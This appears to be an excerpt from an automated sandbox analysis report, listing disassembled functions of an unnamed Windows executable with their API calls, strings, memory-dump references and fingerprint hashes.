??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00000000,00000000,?,PreExtract,0041AA3C,?,?,00406F9F,?,?,00000000,PreExtract), ref: 004023F8
??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00000000,00000000,?,PreExtract,0041AA3C,?,?,00406F9F,?,?), ref: 0040241B

Strings

PreExtract, xrefs: 00402369

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$memcpy
String ID: PreExtract
API String ID: 750647942-1883995278
Opcode ID: e695908261d8e44da6e4391d7ef5d12bbb7850b021f519d7d2ccae3465a307d2
Instruction ID: 45d7e0e5023832e0b8c8538628168a0a11dddb05f7aa8aa784a61664bfc27f9f
Opcode Fuzzy Hash: e695908261d8e44da6e4391d7ef5d12bbb7850b021f519d7d2ccae3465a307d2
Instruction Fuzzy Hash: F8218671804106EBDF14EF91C986AEEB775EF11314F20442BE902B61E1E77C9E85CB98

Function 00405E96 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00411BBA: memcpy.MSVCRT(00000000,00000000,?,?,?,00000000,004025B9,?,?,0041E788,0040297D,00000000,?,0040508D,?,?), ref: 00411BD6

SetEnvironmentVariableW.KERNELBASE(0092BBC0,00000000,0092BBB4,SetEnvironment,00000000,?,00000000), ref: 00405ED0
??3@YAXPAX@Z.MSVCRT(?), ref: 00405ED9

Strings

SetEnvironment, xrefs: 00405E9C

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@EnvironmentVariablememcpy
String ID: SetEnvironment
API String ID: 357128876-360490078
Opcode ID: 48f5db1aa3807254ce0d3c3ba3599f528be59d7b2ec74138965f66581f357966
Instruction ID: 5015d73053f31e41eb786119d6f7a2c70dc77ac034249f383db117d4599dd948
Opcode Fuzzy Hash: 48f5db1aa3807254ce0d3c3ba3599f528be59d7b2ec74138965f66581f357966
Instruction Fuzzy Hash: 6FF01236900114AFDB11EF95FC41CCEB775EB143047408179E961A71B2DB35A955CF8D

Function 00403FB2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(GetNativeSystemInfo), ref: 00403FC3
GetNativeSystemInfo.KERNELBASE(?,?,?,00403FE2,004061EA,00000001,00000001,00000000,?,00000000), ref: 00403FD1

Strings

GetNativeSystemInfo, xrefs: 00403FB8

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: AddressInfoNativeProcSystem
String ID: GetNativeSystemInfo
API String ID: 2220751540-3949249589
Opcode ID: deffbf9ad2f06d67f5a7a96eac976a7a49d3226baf58badd71ca99372c048d5e
Instruction ID: 809e6a6de965d18d48b39f8f4e00aed40c1c5cd8ab5549a1552232fcd34172b3
Opcode Fuzzy Hash: deffbf9ad2f06d67f5a7a96eac976a7a49d3226baf58badd71ca99372c048d5e
Instruction Fuzzy Hash: 0ED0A72070020566CB059FB1AD059DB77F89A086487100170E803F00D0EA79DD90D365

Function 00417EA2 Relevance: 4.7, APIs: 3, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 0041563D: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417EB7), ref: 0041566D
Part of subcall function 0041563D: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00417EB7), ref: 0041567E

??2@YAPAXI@Z.MSVCRT(?), ref: 0041800B
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,40000000,?,?,?), ref: 00418029
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,40000000,?,?,?,40000000), ref: 00418170

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$??2@
String ID:
API String ID: 4113381792-0
Opcode ID: c15f5d0beeeb490aad9ffba395f768548b5be021a449d81dfc99857ea69e856a
Instruction ID: cc61e8b391bfb9a68098a7a85693b93431bc851093f7dc7a68c56b28134787d6
Opcode Fuzzy Hash: c15f5d0beeeb490aad9ffba395f768548b5be021a449d81dfc99857ea69e856a
Instruction Fuzzy Hash: 75917E30A0464AEFCF14DFA5C480AEEFBB1BF08304F10852EE45593351DB79AA95CB99

Function 004163FE Relevance: 4.6, APIs: 3, Instructions: 150COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00008000), ref: 00416445
memmove.MSVCRT(?,00000000,00000020), ref: 00416516
??3@YAXPAX@Z.MSVCRT(?), ref: 0041652A

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??2@??3@memmove
String ID:
API String ID: 3828600508-0
Opcode ID: 05ec2175672de1b7bbd471e59bb4d2610a36e6e1bc21139cd237a80f6b11bca6
Instruction ID: e46483b1e26eb5a1fabff0b355717e6b670c62617ced1e5d33f235f132d045da
Opcode Fuzzy Hash: 05ec2175672de1b7bbd471e59bb4d2610a36e6e1bc21139cd237a80f6b11bca6
Instruction Fuzzy Hash: 2351B372A00111ABDF28CE58D944AEF77B5EB44344F26805EEC0AA7245D778ED81C79C

Function 00404E67 Relevance: 4.6, APIs: 3, Instructions: 139COMMON

Download Yara Rule

APIs

Part of subcall function 00403FB2: GetProcAddress.KERNEL32(GetNativeSystemInfo), ref: 00403FC3
Part of subcall function 00403FB2: GetNativeSystemInfo.KERNELBASE(?,?,?,00403FE2,004061EA,00000001,00000001,00000000,?,00000000), ref: 00403FD1

??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404FDA
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404FE2
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404FEA

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$AddressInfoNativeProcSystem
String ID:
API String ID: 3731959171-0
Opcode ID: 5c283d7852b514708a02b75cb6ebbc8b54e1ca4fb39554e1d11dd4f09c4b7cc9
Instruction ID: 186da13b794c0488880814f39f9d3c8b5d3938503a91300c0f4d7e9b813a1536
Opcode Fuzzy Hash: 5c283d7852b514708a02b75cb6ebbc8b54e1ca4fb39554e1d11dd4f09c4b7cc9
Instruction Fuzzy Hash: D8411EB1D0100AABCF05EF91D9519EEB77AAF84308B14802BE61177291DB3D9E46CB59

Function 00405051 Relevance: 4.5, APIs: 3, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68

Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C17
Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C20
Part of subcall function 00411BE5: memcpy.MSVCRT(?,00000000,?,?,?,?,00405076,?,00000000), ref: 00411C38

Part of subcall function 00402963: ??2@YAPAXI@Z.MSVCRT(00000018,?,0040508D,?,?,?,00000000,?,?,?,?,?,?,?,?,004055D0), ref: 00402968

??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 004050C1
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 004050C9

Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA

Part of subcall function 00411CA3: memcpy.MSVCRT(?,00000000,00000002,00000000,?,?,00000000,004050A9,?,0041ADC8,?,?,?,00000000), ref: 00411CD0

Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT(?,?,0041ADC8,?,?,?,00000000), ref: 004050B8

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$??2@memcpy
String ID:
API String ID: 2235277842-0
Opcode ID: 661f259fb05883ee0348b2fd58029c071bd69da0cdcb289f760b6714a35ba1f7
Instruction ID: cd7eefcb3942dadf62e4d55478a983632e4f227aec1de2fe510d8449e6a20180
Opcode Fuzzy Hash: 661f259fb05883ee0348b2fd58029c071bd69da0cdcb289f760b6714a35ba1f7
Instruction Fuzzy Hash: F1015E369040086ADB04F7A6D897EDEB7B99F94318F10406FF602321E5EE796EC5C69C

Function 00411C48 Relevance: 4.5, APIs: 3, Instructions: 41COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C70
??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C79
memcpy.MSVCRT(?,74DF1D70,?,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C93

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??2@??3@memcpy
String ID:
API String ID: 1695611338-0
Opcode ID: eb4113704ef7df0299e623d88e425c6b6c8be198676a832d45efa2abd2ff9853
Instruction ID: 5ae65c736532b918d339eda4e39a4522a491bca8134069b199daa1df5c004d60
Opcode Fuzzy Hash: eb4113704ef7df0299e623d88e425c6b6c8be198676a832d45efa2abd2ff9853
Instruction Fuzzy Hash: 0CF0F673600205BBD7249F5DD84189BF7E9EF84310714852FF24983220E731F8908798

Function 004031BE Relevance: 3.9, APIs: 3, Instructions: 125stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,00920F20,00000000,?,00404EE8,?,?,?,?,?), ref: 004031F5
lstrlenA.KERNEL32(00920F20,?,00000000,00000000,00000000,00000000,?,00920F20,00000000,?,00404EE8,?,?,?,?,?), ref: 004031FD
memmove.MSVCRT(?,?,00920F20,?,?,00001000,00920F20,?,00000000,00000000,00000000,00000000,?,00920F20,00000000), ref: 004032E0

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: lstrlen$memmove
String ID:
API String ID: 1832346882-0
Opcode ID: d3b4572a5035ea254cd94ab5b5b1443f4ae13b851958d648fafb26d562424527
Instruction ID: 6402f2dcb6e7945984cbe825a7499a6737a03c255d7b5dcfc401763690269d5e
Opcode Fuzzy Hash: d3b4572a5035ea254cd94ab5b5b1443f4ae13b851958d648fafb26d562424527
Instruction Fuzzy Hash: 48410371D00258AFCB14DFA9C8948EEBFB9FF48351F1480AAE815B7245D7389E85CB64

Function 004111BB Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?), ref: 004111D7
GetLastError.KERNEL32(?,?,?,?), ref: 004111E4

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 30d92e823d37ce749e0f7cd4d34f4784bcb9e104199bba823438aa63f853fc4d
Instruction ID: cdad48c5939bcc49fa85d80ef965e6b95473a265ce0d2249c6c6cde8a06b51fe
Opcode Fuzzy Hash: 30d92e823d37ce749e0f7cd4d34f4784bcb9e104199bba823438aa63f853fc4d
Instruction Fuzzy Hash: 1BF09A71600218AF8F00CF68DC049DB7BE9AF09324B148269E91AD7360E630DE55EB65

Function 004076D3 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68

KiUserCallbackDispatcher.NTDLL(00000010), ref: 00407715
GetSystemMetrics.USER32(00000011), ref: 00407723

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??2@CallbackDispatcherMetricsSystemUser
String ID:
API String ID: 145748454-0
Opcode ID: 479bd63978f28fe7566e90bf22cf9ab23cd4c2d010775e76fc726262a7908e22
Instruction ID: 717b70004c9186839aecef00c0b16e534ce711e486b0d128d54a4644bfe03861
Opcode Fuzzy Hash: 479bd63978f28fe7566e90bf22cf9ab23cd4c2d010775e76fc726262a7908e22
Instruction Fuzzy Hash: A6F017B4A047058FD3A4EF7AA9402C6BAE5BB58300705C93FD986C7690E7B4B445DF89

Function 00413D81 Relevance: 2.6, APIs: 2, Instructions: 65COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00413D90
LeaveCriticalSection.KERNEL32(?), ref: 00413DC1

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 896c1087cd7bbb7dc627c9ffcc443e77ad22d141fa8ddf54c665425f9ae04d73
Instruction ID: 574acab8dc6da0f92556d3d590f48fbb046e393e5bca8a27cda65f89530e78df
Opcode Fuzzy Hash: 896c1087cd7bbb7dc627c9ffcc443e77ad22d141fa8ddf54c665425f9ae04d73
Instruction Fuzzy Hash: ED2116752007049FCB28CF55E884AA7B7B9FF88711B148A5DE85A8B761C371F941CBA4

Function 00407171 Relevance: 2.5, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 0040717B
GetLastError.KERNEL32 ref: 00407185

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: ead0b55b2ff90a578750a1408e92beac7d58b39fc771555b91704b17d1c49430
Instruction ID: 7524d8466beb45fe17ee677bdba99b749b9283a1bf838bd9c5283ef0b8d4f745
Opcode Fuzzy Hash: ead0b55b2ff90a578750a1408e92beac7d58b39fc771555b91704b17d1c49430
Instruction Fuzzy Hash: 07D09E316192116BEB605E79B8087A726D8BF00761B15C47AA441D63C5EA78DC42465A

Function 00415BE2 Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00415BE7

Part of subcall function 0041817D: _EH_prolog.MSVCRT ref: 00418182

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9b468c4666b132781755553e503f48ddc8162a130e10772a6baf9a03058fb964
Instruction ID: f396f6b083a0fa58f5464e9653f63b5c42f30b53b93fa251e57ee2b7c9474d42
Opcode Fuzzy Hash: 9b468c4666b132781755553e503f48ddc8162a130e10772a6baf9a03058fb964
Instruction Fuzzy Hash: A7417B31600709DFCB21DF64C884BDAB7A8AF84304F14449AE40ADB211EB79ED85CB60

Function 00405401 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

